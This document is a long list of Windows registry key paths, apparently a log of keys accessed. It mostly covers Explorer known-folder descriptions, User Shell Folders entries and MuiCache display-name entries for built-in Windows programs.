HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\LanguageList
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\System32\ie4uinit.exe,-735
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\System32\ie4uinit.exe,-734
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\AccessibilityCpl.dll,-10
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\System32\ie4uinit.exe,-737
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Programs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuSubFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PropertyBag
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Start Menu
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\sud.dll,-1
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\wucltux.dll,-1
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\ehome\ehres.dll,-100
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Program Files\Windows Sidebar\sidebar.exe,-1005
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\WindowsAnytimeUpgradeUI.exe,-1
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Program Files\DVD Maker\DVDMaker.exe,-61403
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\FXSRESM.dll,-114
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\unregmp2.exe,-4
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\XpsRchVw.exe,-102
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\displayswitch.exe,-320
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Program Files\Common Files\Microsoft Shared\Ink\mip.exe,-291
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\mblctr.exe,-1008
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\NetProjW.dll,-501
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\mstsc.exe,-4000
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\SnippingTool.exe,-15051
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\SoundRecorder.exe,-100
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\SNTSearch.dll,-505
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\System32\SyncCenter.dll,-3000
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\OobeFldr.dll,-33056
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\Speech\SpeechUX\sapi.cpl,-5555
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\dfrgui.exe,-103
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\wdc.dll,-10030
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\msinfo32.exe,-100
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\rstrui.exe,-100
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\miguiresource.dll,-201
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\migwiz\wet.dll,-591
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\migwiz\wet.dll,-588
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Program Files\Common Files\Microsoft Shared\Ink\ShapeCollector.exe,-298
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Program Files\Common Files\Microsoft Shared\Ink\TipTsf.dll,-80
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Program Files\Windows Journal\Journal.exe,-3074
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe,-102
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe,-101
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\comres.dll,-3410
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\mycomput.dll,-300
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\odbcint.dll,-1310
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\miguiresource.dll,-101
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\iscsicpl.dll,-5001
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\MdSched.exe,-4001
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\wdc.dll,-10021
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\pmcsnap.dll,-700
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\wsecedit.dll,-718
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\filemgmt.dll,-2204
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\msconfig.exe,-126
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\System32\AuthFWGP.dll,-20
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\gameux.dll,-10082
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\sdcpl.dll,-101
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\recdisc.exe,-2000
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\msra.exe,-100
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Programs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Desktop
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\PropertyBag
HKEY_CLASSES_ROOT\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\SortOrderIndex
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Description
